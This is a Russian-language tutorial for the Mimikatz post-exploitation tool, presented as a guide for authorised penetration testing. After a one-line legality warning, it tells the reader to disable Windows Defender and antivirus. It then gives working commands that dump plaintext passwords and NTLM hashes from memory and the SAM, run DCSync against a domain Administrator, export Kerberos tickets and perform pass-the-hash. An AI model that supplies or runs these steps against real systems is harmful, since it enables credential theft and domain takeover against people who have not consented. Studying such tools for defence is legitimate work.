Введение

Mimikatz — это мощный инструмент постэксплуатации, предназначенный для извлечения паролей в открытом виде, хешей, PIN-кодов и билетов Kerberos из памяти. Он широко используется тестировщиками на проникновение и специалистами по безопасности для оценки уязвимостей системы. Этот гид предоставляет пошаговый подход к установке и использованию Mimikatz для этичного тестирования безопасности.

Внимание: Неавторизованное использование Mimikatz является незаконным. Убедитесь, что у вас есть разрешение перед его использованием в любой среде.

Предварительные требования

Перед установкой Mimikatz убедитесь, что у вас есть следующее:

  • Машина с Windows 7, 10, 11 или серверные версии
  • Административные привилегии
  • Отключенный Windows Defender и любое антивирусное программное обеспечение (Mimikatz часто помечается как вредоносное ПО)

Скачивание Mimikatz

Mimikatz — это инструмент с открытым исходным кодом, доступный на GitHub. Чтобы скачать его:

  1. Откройте веб-браузер и перейдите по адресу https://github.com/gentilkiwi/mimikatz.
  2. Нажмите на Code > Download ZIP.
  3. Извлеките ZIP-файл в папку по вашему выбору.

В качестве альтернативы вы можете клонировать репозиторий с помощью Git:

 git clone https://github.com/gentilkiwi/mimikatz.git

Запуск Mimikatz

Поскольку Mimikatz требует административных привилегий, выполните следующие шаги для его запуска:

  1. Откройте Командную строку или PowerShell от имени администратора.
  2. Перейдите в папку, куда вы извлекли Mimikatz:
    cd pathtomimikatzx64
  3. Запустите Mimikatz:
    mimikatz.exe
  4. Вы должны увидеть интерфейс командной строки с подсказкой mimikatz #.

Основные команды Mimikatz

1. Проверка системных привилегий

Перед извлечением учетных данных убедитесь, что у вас достаточно привилегий:

privilege::debug

Если успешно, вы должны увидеть: Privilege '20' OK

2. Извлечение паролей из памяти

Чтобы извлечь пароли в открытом виде из памяти, используйте:

sekurlsa::logonpasswords

Это отобразит имя пользователя, домен и пароли в открытом виде, если они доступны.

3. Извлечение хешей NTLM

Хеши NTLM могут быть использованы для атак pass-the-hash. Чтобы извлечь их, выполните:

lsadump::sam

Или, для удаленных систем:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

4. Извлечение билетов Kerberos

Чтобы получить билеты Kerberos из системы:

sekurlsa::tickets /export

Это экспортирует файлы .kirbi, которые могут быть использованы в атаках pass-the-ticket.

5. Атака pass-the-hash

Чтобы аутентифицироваться с помощью хеша NTLM вместо пароля:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>